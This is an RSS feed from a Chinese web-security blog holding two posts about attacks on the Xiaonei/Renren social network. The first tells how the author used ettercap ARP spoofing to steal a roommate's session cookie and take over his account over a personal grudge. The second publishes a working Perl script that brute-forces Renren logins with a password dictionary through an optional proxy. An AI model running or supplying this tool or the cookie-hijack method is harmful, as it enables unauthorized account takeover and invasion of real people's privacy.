0x50sec.org » 校内网 http://www.0x50sec.org Focus on web security! Fri, 13 Jan 2012 09:23:52 +0000 en hourly 1 http://wordpress.org/?v=3.1 交换机环境下利用ettercap盗取cookie劫持校内网认证会话 http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/ http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/#comments Mon, 24 May 2010 03:23:23 +0000 admin http://www.0x50sec.org/?p=890 昨天跟某舍友下象棋,说谁输了就买雪糕给对方吃。

男子汉大豆腐,焉能言而无信,谁料在我将死对方后,对方居然真的使用了绝技,死不认帐,耍赖皮。

俺只好将其行公布于校内网,结果连我们导师都鄙视那种行为,并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器,在校内网颠倒是非、指鹿为马。偶只好进入其校内网,断其话语权,还事实真想于大众。

本来那厮用的网页登录很容易搞到其密码,谁知最近用了个校内网客户端,从那里进入网页,也就不用登录了。这下好,搞不到密码就搞他的cookie吧,反正一样。

ettercap出场,贴图

利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接

查看会话校信息找到cookie

利用tamper data修改cookie成功登录校内网,还原事实真想并修改其头像恶搞一下

]]> http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/feed/ 1 一个简单的校内网、人人网帐号暴力破解工具(Perl) http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/ http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/#comments Wed, 03 Mar 2010 03:07:10 +0000 admin http://www.0x50sec.org/?p=111 一个简单的校内网、人人网帐号暴力破解工具(Perl)
单线程、支持HTTP代理。

windows用户一般需要安装active perl等perl解析程序。

然后用老婆的账号测试了一下,因为我知道老婆的所有信息,让然我也知道老婆的密码,这里仅仅是测试一下。不一会就跑出了人人网账号的密码。

当然需要事先知道账号的邮箱地址才能破解。

此程序仅供学习研究之用,严禁用于侵犯别人隐私的行为。


#!/usr/bin/perl
# detectxn.pl
# Brute force for xiaonei.com、renren.com
# By 0x50sec.org Just for fun
# If you wanna to detect sombody's account ,please use Dansnow...
#Thanks google.com,milw0rm.com,xfocus.net...
use POSIX;
use LWP::UserAgent;

sub isproxy
{
my $t=0;
foreach (@ARGV)
{
if ($ARGV[$t] eq “–proxy”){$proxy = $ARGV[$t+1]}
$t++;
}
}

sub Usage
{
print(“\n”);
print(“[+] Usage: $0 \n”);
print(“[+] Coded by hackerxwar\n”);
print(“\n”);
}

sub try_login
{
my ($user, $passdic) = @_;
my $okflag = 0;
my $lwp = new LWP::UserAgent or die;
$lwp->agent(‘Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6)’);
$lwp->proxy(“http”, “http://$proxy/”) if defined($proxy);
open(FH,”<$passdic”);
while() #readdicfile
{
chomp;
my $pwd=$_;
printf(“Now try …”.$user.”~~~~”.$pwd);
my $res = $lwp->post( $target,
['email' => $user,
'password' => $pwd,
'origURL' => "/home.do?from=8000103",
]
);
my $myres=$res->content; #for test
#printf($myres) ; #for test
#print “$res->status_line”;
#if($myres=~/http:\/\/login.renren.com\/callback.do/)
#To judge if the login is sucess
if($res->status_line =~ /^302/)
{
$okflag = 1;
printf(“\n++++++++++++++++++++++++++++++++++++++++++++++++++++\n”);
print(“\n[+]“.$res->status_line.”\tlogin OK with : $user~~~~$pwd \n”);
printf(“\n++++++++++++++++++++++++++++++++++++++++++++++++++++\n”);
last;
}
else
{
printf(“\t[-]“.$res->status_line.”\tlogin failed!\n”);
}
}
close(FH);
if($okflag == 0)
{
printf(“\n—————————————————–\n”);
printf(“[-]login failed with $user and dicfile $passdic…”);
printf(“\n—————————————————–\n”);
}
return 1;
}

if(@ARGV < 2)
{
Usage();
exit;
}
isproxy();
print (“Use proxy: “.$proxy.”\n”) if defined($proxy);
$target =”http://m.renren.com/login.do”;
$user=$ARGV[0];
$passdic=$ARGV[1];
Usage();
try_login($user,$passdic) or die “[-] login failed with $user and dic:$passdic\n”;

下载地址:cxn.pl.tar

]]> http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/feed/ 49